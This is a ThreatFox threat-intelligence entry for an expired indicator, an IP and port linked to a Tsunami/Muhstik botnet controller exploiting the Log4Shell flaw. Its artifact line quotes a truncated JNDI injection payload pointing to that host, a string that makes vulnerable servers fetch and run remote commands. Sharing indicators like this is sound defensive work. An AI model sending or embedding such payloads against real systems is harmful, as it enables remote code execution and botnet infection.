ThreatFox IOC Database
You are viewing the ThreatFox database entry for ip:port 79.172.214.11:1389.
Database Entry
This IOC expired
This IOC is an old IOC and hence has expired on 2026-04-07 01:15:01 UTC. We therefore refrain from exporting it into our datasets. As a result, this database entry is purely informational and has no impact.
| IOC ID: | 275318 |
|---|---|
| IOC: | 79.172.214.11:1389 |
| IOC Type : | ip:port |
| Threat Type : | botnet_cc |
| Malware: | Tsunami |
| Malware alias: | Muhstik, Radiation, Amnesia |
| Confidence Level : | Confidence level is moderate (50%) |
| Is compromised? : | False |
| ASN: | AS39679 ASJZTKFT |
| Country: |  HU |
| First seen: | 2021-12-13 13:00:59 UTC |
| Last seen: | 2021-12-13 18:58:01 UTC |
| UUID: | b7ec13d8-5c14-11ec-8ab6-42010aa4000a |
| Reporter |  r3dbU7z |
| Reward | 5 credits from ThreatFox |
| Tags: | CVE-2021-44228 log4j Muhstik |
r3dbU7z
Artifact: "(Thread2): [ 723738.186870] FSFS (2): fsfsFlashFileHandleOpen: File 'flash://${jndi:ldap://79.172.214.11:1389/Basic/Command/Base64/Y3Vyb"Ref:https://www.zoomeye.org/searchDetail?type=host&title=4d9a34a1b0f0023e33aca2bf395cce40